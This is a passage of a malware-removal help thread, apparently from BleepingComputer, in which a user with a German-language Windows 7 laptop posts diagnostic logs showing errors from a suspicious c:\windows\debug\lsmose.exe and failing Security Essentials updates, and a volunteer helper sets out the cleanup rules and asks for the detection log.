Description: Aus einem der folgenden Gründe kann nicht auf die Datei "" zugegriffen werden:
Es besteht ein Problem mit der Netzwerkverbindung, dem Datenträger mit der gespeicherten Datei bzw. den auf dem Computer installierten
Speichertreibern, oder der Datenträger fehlt.
Das Programm Mediatek Wireless LAN Card Utility wurde wegen dieses Fehlers geschlossen.

Programm: Mediatek Wireless LAN Card Utility
Datei:

Der Fehlerwert ist im Abschnitt "Zusätzliche Dateien" aufgelistet.
Benutzeraktion
1. Öffnen Sie die Datei erneut.
Diese Situation ist eventuell ein temporäres Problem, das selbstständig behoben wird, wenn das Programm erneut ausgeführt wird.
2.
Wenn Sie weiterhin nicht auf die Datei zugreifen können und
 - diese sich im Netzwerk befindet,
dann sollte der Netzwerkadministrator überprüfen, dass kein Netzwerkproblem besteht und dass eine Verbindung mit dem Server hergestellt werden kann.
 - diese sich auf einem Wechseldatenträger, wie z. B. einer Diskette oder einer CD, befindet, überprüfen Sie, ob der Datenträger richtig in den Computer eingelegt ist.
3. Überprüfen und reparieren Sie das Dateisystem, indem Sie CHKDSK ausführen. Klicken Sie dazu im Menü "Start" auf "Ausführen", geben Sie CMD ein, und klicken Sie auf "OK". Geben Sie an der Eingabeaufforderung CHKDSK /F ein, und drücken Sie die EINGABETASTE.
4. Stellen Sie die Datei von einer Sicherungskopie wieder her, wenn das Problem weiterhin besteht.
5. Überprüfen Sie, ob andere Dateien auf demselben Datenträger geöffnet werden können. Falls dies nicht möglich ist, ist der Datenträger eventuell beschädigt.
Wenden Sie sich an den Administrator oder den Hersteller der Computerhardware, um weitere Unterstützung zu erhalten, wenn es sich um eine Festplatte handelt.

Zusätzliche Daten
Fehlerwert: 3FCE17DE
Datenträgertyp: 0

Error: (08/23/2017 02:59:44 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: lsmose.exe, Version: 5.0.9.19, Zeitstempel: 0x59747423
Name des fehlerhaften Moduls: lsmose.exe, Version: 5.0.9.19, Zeitstempel: 0x59747423
Ausnahmecode: 0xc000001d
Fehleroffset: 0x00000000000117de
ID des fehlerhaften Prozesses: 0x838
Startzeit der fehlerhaften Anwendung: 0x01d31c0fb04cf48d
Pfad der fehlerhaften Anwendung: c:\windows\debug\lsmose.exe
Pfad des fehlerhaften Moduls: c:\windows\debug\lsmose.exe
Berichtskennung: eed47e06-8802-11e7-bc48-005056c00008

Error: (08/23/2017 06:00:56 AM) (Source: Application Error) (EventID: 1005) (User: )
Description: Aus einem der folgenden Gründe kann nicht auf die Datei "" zugegriffen werden:
Es besteht ein Problem mit der Netzwerkverbindung, dem Datenträger mit der gespeicherten Datei bzw. den auf dem Computer installierten
Speichertreibern, oder der Datenträger fehlt.
Das Programm Mediatek Wireless LAN Card Utility wurde wegen dieses Fehlers geschlossen.

Programm: Mediatek Wireless LAN Card Utility
Datei:

Der Fehlerwert ist im Abschnitt "Zusätzliche Dateien" aufgelistet.
Benutzeraktion
1. Öffnen Sie die Datei erneut.
Diese Situation ist eventuell ein temporäres Problem, das selbstständig behoben wird, wenn das Programm erneut ausgeführt wird.
2.
Wenn Sie weiterhin nicht auf die Datei zugreifen können und
 - diese sich im Netzwerk befindet,
dann sollte der Netzwerkadministrator überprüfen, dass kein Netzwerkproblem besteht und dass eine Verbindung mit dem Server hergestellt werden kann.
 - diese sich auf einem Wechseldatenträger, wie z. B. einer Diskette oder einer CD, befindet, überprüfen Sie, ob der Datenträger richtig in den Computer eingelegt ist.
3. Überprüfen und reparieren Sie das Dateisystem, indem Sie CHKDSK ausführen. Klicken Sie dazu im Menü "Start" auf "Ausführen", geben Sie CMD ein, und klicken Sie auf "OK". Geben Sie an der Eingabeaufforderung CHKDSK /F ein, und drücken Sie die EINGABETASTE.
4. Stellen Sie die Datei von einer Sicherungskopie wieder her, wenn das Problem weiterhin besteht.
5. Überprüfen Sie, ob andere Dateien auf demselben Datenträger geöffnet werden können. Falls dies nicht möglich ist, ist der Datenträger eventuell beschädigt.
Wenden Sie sich an den Administrator oder den Hersteller der Computerhardware, um weitere Unterstützung zu erhalten, wenn es sich um eine Festplatte handelt.

Zusätzliche Daten
Fehlerwert: 3F4F17DE
Datenträgertyp: 0

Error: (08/23/2017 06:00:56 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: lsmose.exe, Version: 5.0.9.19, Zeitstempel: 0x59747423
Name des fehlerhaften Moduls: lsmose.exe, Version: 5.0.9.19, Zeitstempel: 0x59747423
Ausnahmecode: 0xc000001d
Fehleroffset: 0x00000000000117de
ID des fehlerhaften Prozesses: 0xa34
Startzeit der fehlerhaften Anwendung: 0x01d31bc4676adb96
Pfad der fehlerhaften Anwendung: c:\windows\debug\lsmose.exe
Pfad des fehlerhaften Moduls: c:\windows\debug\lsmose.exe
Berichtskennung: a9d56442-87b7-11e7-9116-005056c00008

Error: (08/22/2017 05:44:13 PM) (Source: Application Error) (EventID: 1005) (User: )
Description: Aus einem der folgenden Gründe kann nicht auf die Datei "" zugegriffen werden:
Es besteht ein Problem mit der Netzwerkverbindung, dem Datenträger mit der gespeicherten Datei bzw. den auf dem Computer installierten
Speichertreibern, oder der Datenträger fehlt.
Das Programm Mediatek Wireless LAN Card Utility wurde wegen dieses Fehlers geschlossen.

Programm: Mediatek Wireless LAN Card Utility
Datei:

Der Fehlerwert ist im Abschnitt "Zusätzliche Dateien" aufgelistet.
Benutzeraktion
1. Öffnen Sie die Datei erneut.
Diese Situation ist eventuell ein temporäres Problem, das selbstständig behoben wird, wenn das Programm erneut ausgeführt wird.
2.
Wenn Sie weiterhin nicht auf die Datei zugreifen können und
 - diese sich im Netzwerk befindet,
dann sollte der Netzwerkadministrator überprüfen, dass kein Netzwerkproblem besteht und dass eine Verbindung mit dem Server hergestellt werden kann.
 - diese sich auf einem Wechseldatenträger, wie z. B. einer Diskette oder einer CD, befindet, überprüfen Sie, ob der Datenträger richtig in den Computer eingelegt ist.
3. Überprüfen und reparieren Sie das Dateisystem, indem Sie CHKDSK ausführen. Klicken Sie dazu im Menü "Start" auf "Ausführen", geben Sie CMD ein, und klicken Sie auf "OK". Geben Sie an der Eingabeaufforderung CHKDSK /F ein, und drücken Sie die EINGABETASTE.
4. Stellen Sie die Datei von einer Sicherungskopie wieder her, wenn das Problem weiterhin besteht.
5. Überprüfen Sie, ob andere Dateien auf demselben Datenträger geöffnet werden können. Falls dies nicht möglich ist, ist der Datenträger eventuell beschädigt.
Wenden Sie sich an den Administrator oder den Hersteller der Computerhardware, um weitere Unterstützung zu erhalten, wenn es sich um eine Festplatte handelt.

Zusätzliche Daten
Fehlerwert: 3F1917DE
Datenträgertyp: 0

Error: (08/22/2017 05:44:13 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: lsmose.exe, Version: 5.0.9.19, Zeitstempel: 0x59747423
Name des fehlerhaften Moduls: lsmose.exe, Version: 5.0.9.19, Zeitstempel: 0x59747423
Ausnahmecode: 0xc000001d
Fehleroffset: 0x00000000000117de
ID des fehlerhaften Prozesses: 0xcb0
Startzeit der fehlerhaften Anwendung: 0x01d31b5d7e9bae76
Pfad der fehlerhaften Anwendung: c:\windows\debug\lsmose.exe
Pfad des fehlerhaften Moduls: c:\windows\debug\lsmose.exe
Berichtskennung: be91cbda-8750-11e7-93b2-005056c00008

Systemfehler:
=============
Error: (08/24/2017 07:35:07 PM) (Source: Schannel) (EventID: 4119) (User: NT-AUTORITÄT)
Description: Es wurde eine schwerwiegende Warnung empfangen: 20.

Error: (08/24/2017 06:57:41 PM) (Source: Schannel) (EventID: 4119) (User: NT-AUTORITÄT)
Description: Es wurde eine schwerwiegende Warnung empfangen: 20.

Error: (08/24/2017 05:42:15 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT-AUTORITÄT)
Description: Installationsfehler: Die Installation des folgenden Updates ist mit Fehler 0x80070643 fehlgeschlagen: Definitionsupdate für Microsoft Security Essentials – KB2310138 (Definition 1.251.34.0)

Error: (08/24/2017 05:41:52 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Beim Aktualisieren der Signaturen wurde von Microsoft-Antischadsoftware ein Fehler festgestellt.

 Neue Signaturversion:

 Vorherige Signaturversion: 1.249.1403.0

 Aktualisierungsquelle: Microsoft Update Server

 Aktualisierungsphase: Installieren

 Quellpfad: http://www.microsoft.com

 Signaturtyp: AntiVirus

 Aktualisierungstyp: Vollständig

 Benutzer: NT-AUTORITÄT\SYSTEM

 Aktuelle Modulversion:

 Vorherige Modulversion: 1.1.14003.0

 Fehlercode: 0x80070643

 Fehlerbeschreibung: Schwerwiegender Fehler bei der Installation.

Error: (08/24/2017 05:05:33 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "GREGService" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (08/22/2017 07:03:30 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT-AUTORITÄT)
Description: Installationsfehler: Die Installation des folgenden Updates ist mit Fehler 0x80070643 fehlgeschlagen: Definitionsupdate für Microsoft Security Essentials – KB2310138 (Definition 1.249.1361.0)

Error: (08/22/2017 07:03:03 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Beim Aktualisieren der Signaturen wurde von Microsoft-Antischadsoftware ein Fehler festgestellt.

 Neue Signaturversion:

 Vorherige Signaturversion: 1.249.1318.0

 Aktualisierungsquelle: Microsoft Update Server

 Aktualisierungsphase: Installieren

 Quellpfad: http://www.microsoft.com

 Signaturtyp: AntiVirus

 Aktualisierungstyp: Vollständig

 Benutzer: NT-AUTORITÄT\SYSTEM

 Aktuelle Modulversion:

 Vorherige Modulversion: 1.1.14003.0

 Fehlercode: 0x80070643

 Fehlerbeschreibung: Schwerwiegender Fehler bei der Installation.

Error: (08/20/2017 05:47:23 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT-AUTORITÄT)
Description: Installationsfehler: Die Installation des folgenden Updates ist mit Fehler 0x80070643 fehlgeschlagen: Definitionsupdate für Microsoft Security Essentials – KB2310138 (Definition 1.249.1283.0)

Error: (08/20/2017 05:47:24 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Beim Aktualisieren der Signaturen wurde von Microsoft-Antischadsoftware ein Fehler festgestellt.

 Neue Signaturversion:

 Vorherige Signaturversion: 1.249.1265.0

 Aktualisierungsquelle: Microsoft Update Server

 Aktualisierungsphase: Installieren

 Quellpfad: http://www.microsoft.com

 Signaturtyp: AntiVirus

 Aktualisierungstyp: Vollständig

 Benutzer: NT-AUTORITÄT\SYSTEM

 Aktuelle Modulversion:

 Vorherige Modulversion: 1.1.14003.0

 Fehlercode: 0x80070643

 Fehlerbeschreibung: Schwerwiegender Fehler bei der Installation.

Error: (07/23/2017 05:50:05 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Der Dienst "Windows Search" wurde mit folgendem dienstspezifischem Fehler beendet: Die Klasse wurde so konfiguriert, dass sie unter einer anderen Sicherheitskennung als der Aufrufer ausgeführt werden kann.
.

CodeIntegrity:
===================================
  Date: 2017-07-23 08:06:28.583
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-07-23 07:49:56.074
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-07-22 21:03:51.043
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-07-19 17:27:33.622
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-07-18 19:15:24.279
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-06 15:24:21.181
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-04-19 18:55:57.044
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-03-05 12:37:09.010
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-03-05 12:20:40.059
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-02-28 17:09:44.548
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

==================== Speicherinformationen ===========================

Prozessor: Intel® Core™ i5 CPU M 460 @ 2.53GHz
Prozentuale Nutzung des RAM: 36%
Installierter physikalischer RAM: 3764.48 MB
Verfügbarer physikalischer RAM: 2380.21 MB
Summe virtueller Speicher: 7527.15 MB
Verfügbarer virtueller Speicher: 6039.7 MB

==================== Laufwerke ================================

Drive c: (Acer) (Fixed) (Total:451.66 GB) (Free:294.46 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: EF7C6B51)
Partition 1: (Not Active) - (Size=14 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=451.7 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================

 

 

 



BC AdBot (Login to Remove)

 


#2 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,670 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:07:06 AM

Posted 25 August 2017 - 11:49 AM

Hi Schub :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broke the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lenghty, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread
This being said, it's time to clean-up some malware, so let's get started, shall we? :)

A couple of questions before we start:
  • Can you attach the Microsoft Security Essentials log where this detection occurs? So I can see what file, path, Registry key, etc. is being detected?
  • Also, is this your own, personal laptop, or does it belongs to a company? Is it configured for personal use, or business use?

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 Schub

Schub
  • Topic Starter

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Local time:01:06 PM

Posted 25 August 2017 - 02:04 PM

Hi Aura,
many thanks for your answer and your Support.
This is my personal Laptop, used only by me.

 

Unfortunately the file is to big, so I get "Post to long".
I started at 01.Aug. 2017. The Virus hit me on 23.08.2017
first I think.

 

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-01 15:48:58Z
Process: 3e0.1d30addb0247f40
Command: /stub 1.1.13850.0 /payload 1.249.505.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.474.0.exe ANTIMALWARE /q
Administrator: yes
Version: 1.1.13850.0

================================ ProductSearch =================================

               Microsoft Antimalware (Beijing):   
       Status: Active                             
  ProductGUID: EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
       Engine: 1.1.14003.0                        
  AS base VDM: 1.249.0.0                          
  AV base VDM: 1.249.0.0                          
 AS delta VDM: 1.249.474.0                        
 AV delta VDM: 1.249.474.0                        
   NIS engine: 2.1.13804.0                        
 NIS base VDM: 117.0.0.0                          
 NIS full VDM: 117.2.0.0                          
     Platform: 4.10.209.0                         

============================== AccumulatePackages ==============================

PackageName:*C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.474.0.exe

=============================== PackageDiscovery ===============================

                   Package files discovered:
                                  Directory: C:\Windows\Temp\A668ABA6-84C4-410E-8055-96FA54A806543e0.1d30addb0247f40
 1.249.474.0_to_1.249.505.0_mpasdlta.vdm._p: b22ee8be084d1cbacf0225180ca59f926997eaa778d73e452e321ae7e3ea18fb      
 1.249.474.0_to_1.249.505.0_mpavdlta.vdm._p: 87fd38f8599e8084a1f231b082219cddd46819e441524144eef2a3e870bbd5b5      
               AM BDD:    
       Engine: Not included
  AS base VDM: Not included
  AV base VDM: Not included
 AS delta VDM: 1.249.505.0
 AV delta VDM: 1.249.505.0

=============================== PatchApplication ===============================

Patched mpasdlta.vdm to 1.249.505.0
Patched mpavdlta.vdm to 1.249.505.0

==================================== Update ====================================

 Product name: Microsoft Antimalware (Beijing)
                              Package files:
                                  Directory: C:\Windows\Temp\A668ABA6-84C4-410E-8055-96FA54A806543e0.1d30addb0247f40
 1.249.474.0_to_1.249.505.0_mpasdlta.vdm._p: b22ee8be084d1cbacf0225180ca59f926997eaa778d73e452e321ae7e3ea18fb      
 1.249.474.0_to_1.249.505.0_mpavdlta.vdm._p: 87fd38f8599e8084a1f231b082219cddd46819e441524144eef2a3e870bbd5b5      
                               mpasdlta.vdm: d9db80d88066dbd4aeb48e9e56f069b09e30020d07244d86f0e23c50ae23f14d         1.249.505.0
                               mpavdlta.vdm: 2732e6df07533bec8fdb000239f58f01d84a83e7dd096dfbbc8bc55c8bef9943         1.249.505.0
SignatureLocation changed from c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{C59EE1E9-9E7E-4B34-9A57-04C612E08E7C} to c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{8D38D21C-ACDF-412F-A2F1-2F006B562B37}
Signatures updated from C:\Windows\Temp\A668ABA6-84C4-410E-8055-96FA54A806543e0.1d30addb0247f40

================================ ValidateUpdate ================================

MpSigStub successfully updated Microsoft Antimalware (Beijing) using the AM BDD package.

               Original:    Updated to:
 AS delta VDM: 1.249.474.0  1.249.505.0
 AV delta VDM: 1.249.474.0  1.249.505.0

DeltaUpdateFailure set to 0
BddUpdateFailure set to 0
End time: 2017-08-01 15:49:46Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-02 17:33:56Z
Process: 1158.1d30bb58495c239
Command: /stub 1.1.13850.0 /payload 1.249.561.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.505.0.exe ANTIMALWARE /q
Administrator: yes
Version: 1.1.13850.0

================================ ProductSearch =================================

               Microsoft Antimalware (Beijing):   
       Status: Active                             
  ProductGUID: EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
       Engine: 1.1.14003.0                        
  AS base VDM: 1.249.0.0                          
  AV base VDM: 1.249.0.0                          
 AS delta VDM: 1.249.505.0                        
 AV delta VDM: 1.249.505.0                        
   NIS engine: 2.1.13804.0                        
 NIS base VDM: 117.0.0.0                          
 NIS full VDM: 117.2.0.0                          
     Platform: 4.10.209.0                         

============================== AccumulatePackages ==============================

PackageName:*C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.505.0.exe

=============================== PackageDiscovery ===============================

                   Package files discovered:
                                  Directory: C:\Windows\Temp\C33DC2E5-73E6-4FF6-A1DA-3B5E40CED0AA1158.1d30bb58495c239
 1.249.505.0_to_1.249.561.0_mpasdlta.vdm._p: 7d294157b6da54018b6cfb76c3697b54d608924ae9bfdc893ede878029d6e81e       
 1.249.505.0_to_1.249.561.0_mpavdlta.vdm._p: 9f75d6537a960601a6583bf4ca49b6690cdbc9d120c3ba6df49eb42e2ee3b03d       
               AM BDD:    
       Engine: Not included
  AS base VDM: Not included
  AV base VDM: Not included
 AS delta VDM: 1.249.561.0
 AV delta VDM: 1.249.561.0

=============================== PatchApplication ===============================

Patched mpasdlta.vdm to 1.249.561.0
Patched mpavdlta.vdm to 1.249.561.0

==================================== Update ====================================

 Product name: Microsoft Antimalware (Beijing)
                              Package files:
                                  Directory: C:\Windows\Temp\C33DC2E5-73E6-4FF6-A1DA-3B5E40CED0AA1158.1d30bb58495c239
 1.249.505.0_to_1.249.561.0_mpasdlta.vdm._p: 7d294157b6da54018b6cfb76c3697b54d608924ae9bfdc893ede878029d6e81e       
 1.249.505.0_to_1.249.561.0_mpavdlta.vdm._p: 9f75d6537a960601a6583bf4ca49b6690cdbc9d120c3ba6df49eb42e2ee3b03d       
                               mpasdlta.vdm: edfab370f634d56fd77d7c85d075c11c8d4fd513ae3bc803975e39fb689a9f5f          1.249.561.0
                               mpavdlta.vdm: a39187ddf11c47322af6ed30b4f4cf93356053ba6650935fbe261ac9d5803448          1.249.561.0
SignatureLocation changed from c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{8D38D21C-ACDF-412F-A2F1-2F006B562B37} to c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{EB05B271-38EA-40F4-994D-2D71EBAA76A8}
Signatures updated from C:\Windows\Temp\C33DC2E5-73E6-4FF6-A1DA-3B5E40CED0AA1158.1d30bb58495c239

================================ ValidateUpdate ================================

MpSigStub successfully updated Microsoft Antimalware (Beijing) using the AM BDD package.

               Original:    Updated to:
 AS delta VDM: 1.249.505.0  1.249.561.0
 AV delta VDM: 1.249.505.0  1.249.561.0

DeltaUpdateFailure set to 0
BddUpdateFailure set to 0
End time: 2017-08-02 17:34:20Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-02 17:34:20Z
Process: db4.1d30bb592bf11fa
Command: /stub 1.1.13850.0 /payload 117.7.0.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\NIS_Delta_Patch.exe
Administrator: yes
Version: 1.1.13850.0

================================ ProductSearch =================================

               Microsoft Windows Defender (Windows 7):  Microsoft Antimalware (Beijing):   
       Status: Disabled                                 Active                             
  ProductGUID: 925A3ACA-C353-458A-AC8D-A7E5EB378092     EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
       Engine: Not found                                1.1.14003.0                        
  AS base VDM: Not found                                1.249.0.0                          
  AV base VDM: Not found                                1.249.0.0                          
 AS delta VDM: Not found                                1.249.561.0                        
 AV delta VDM: Not found                                1.249.561.0                        
   NIS engine:                                          2.1.13804.0                        
 NIS base VDM:                                          117.0.0.0                          
 NIS full VDM:                                          117.2.0.0                          
     Platform: 6.1.7601.18170                           4.10.209.0                         

============================== AccumulatePackages ==============================

PackageName:*C:\Windows\SoftwareDistribution\Download\Install\NIS_Delta_Patch.exe

=============================== PackageDiscovery ===============================

                                 Package files discovered:
                                                Directory: C:\Windows\Temp\C9437903-CB10-4457-B3B5-F6160E0D75F6db4.1d30bb592bf11fa
 117.0.0.0_to_117.7.0.0_NISfull.vdm_source_NISbase.vdm._p: 9b4a1fba83162853aecca0542cf395e299f118c23a7f463d3adcb1ee4a55bb92      
               NIS Delta: 
   NIS engine: Not included
 NIS base VDM: Not included
 NIS full VDM: 117.7.0.0  

=============================== PatchApplication ===============================

Patched nisfull.vdm to 117.7.0.0

==================================== Update ====================================

 Product name: Microsoft Antimalware (Beijing)
                                            Package files:
                                                Directory: C:\Windows\Temp\C9437903-CB10-4457-B3B5-F6160E0D75F6db4.1d30bb592bf11fa
 117.0.0.0_to_117.7.0.0_NISfull.vdm_source_NISbase.vdm._p: 9b4a1fba83162853aecca0542cf395e299f118c23a7f463d3adcb1ee4a55bb92      
                                              nisfull.vdm: d615510581bf8b5d62cc022d32e106caa17672917e692f1df4bbae3bc81cd6bc         117.7.0.0
NISSignatureLocation changed from c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{E45E708F-9487-489B-8BC6-49CC1D8480BF} to c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B6DC2E23-C155-44AD-8932-D2F0C8E16645}
Signatures updated from C:\Windows\Temp\C9437903-CB10-4457-B3B5-F6160E0D75F6db4.1d30bb592bf11fa

================================ ValidateUpdate ================================

MpSigStub successfully updated Microsoft Antimalware (Beijing) using the NIS Delta package.

               Original:  Updated to:
 NIS full VDM: 117.2.0.0  117.7.0.0 

NISDeltaUpdateFailure set to 0
End time: 2017-08-02 17:34:21Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-06 18:55:31Z
Process: fe0.1d30ee59412387d
Command: /stub 1.1.13850.0 /payload 1.249.732.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\AM_Delta.exe ANTIMALWARE /q
Administrator: yes
Version: 1.1.13850.0

================================ ProductSearch =================================

               Microsoft Antimalware (Beijing):   
       Status: Active                             
  ProductGUID: EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
       Engine: 1.1.14003.0                        
  AS base VDM: 1.249.0.0                          
  AV base VDM: 1.249.0.0                          
 AS delta VDM: 1.249.561.0                        
 AV delta VDM: 1.249.561.0                        
   NIS engine: 2.1.13804.0                        
 NIS base VDM: 117.0.0.0                          
 NIS full VDM: 117.7.0.0                          
     Platform: 4.10.209.0                         

============================== AccumulatePackages ==============================

PackageName:*C:\Windows\SoftwareDistribution\Download\Install\AM_Delta.exe

=============================== PackageDiscovery ===============================

 Package files discovered:
                Directory: C:\Windows\Temp\F9700DD2-E3F1-47AE-9E91-02BA931A1460fe0.1d30ee59412387d
             mpasdlta.vdm: ce9e66159e80c9b41a1fd6dca5c84f2206cf0cf3dabbdc889560ef894f43bbf2         1.249.732.0
             mpavdlta.vdm: 75f0261b7e1a4e43084ce3744e3d8baa7cfc0d89b90ea95f768f54dc88ae1b5a         1.249.732.0
               AM Delta:  
       Engine: Not included
  AS base VDM: Not included
  AV base VDM: Not included
 AS delta VDM: 1.249.732.0
 AV delta VDM: 1.249.732.0

==================================== Update ====================================

 Product name: Microsoft Antimalware (Beijing)
 Package files:
     Directory: C:\Windows\Temp\F9700DD2-E3F1-47AE-9E91-02BA931A1460fe0.1d30ee59412387d
  mpasdlta.vdm: ce9e66159e80c9b41a1fd6dca5c84f2206cf0cf3dabbdc889560ef894f43bbf2         1.249.732.0
  mpavdlta.vdm: 75f0261b7e1a4e43084ce3744e3d8baa7cfc0d89b90ea95f768f54dc88ae1b5a         1.249.732.0
SignatureLocation changed from c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{EB05B271-38EA-40F4-994D-2D71EBAA76A8} to c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{345B1E5C-17A6-4A53-9DA0-6D9164506F94}
Signatures updated from C:\Windows\Temp\F9700DD2-E3F1-47AE-9E91-02BA931A1460fe0.1d30ee59412387d

================================ ValidateUpdate ================================

MpSigStub successfully updated Microsoft Antimalware (Beijing) using the AM Delta package.

               Original:    Updated to:
 AS delta VDM: 1.249.561.0  1.249.732.0
 AV delta VDM: 1.249.561.0  1.249.732.0

DeltaUpdateFailure set to 0
BddUpdateFailure set to 0
End time: 2017-08-06 18:56:51Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-07 16:30:22Z
Process: 11c0.1d30f9a776b9755
Command: /stub 1.1.13850.0 /payload 1.249.757.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.732.0.exe ANTIMALWARE /q
Administrator: yes
Version: 1.1.13850.0

================================ ProductSearch =================================

               Microsoft Antimalware (Beijing):   
       Status: Active                             
  ProductGUID: EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
       Engine: 1.1.14003.0                        
  AS base VDM: 1.249.0.0                          
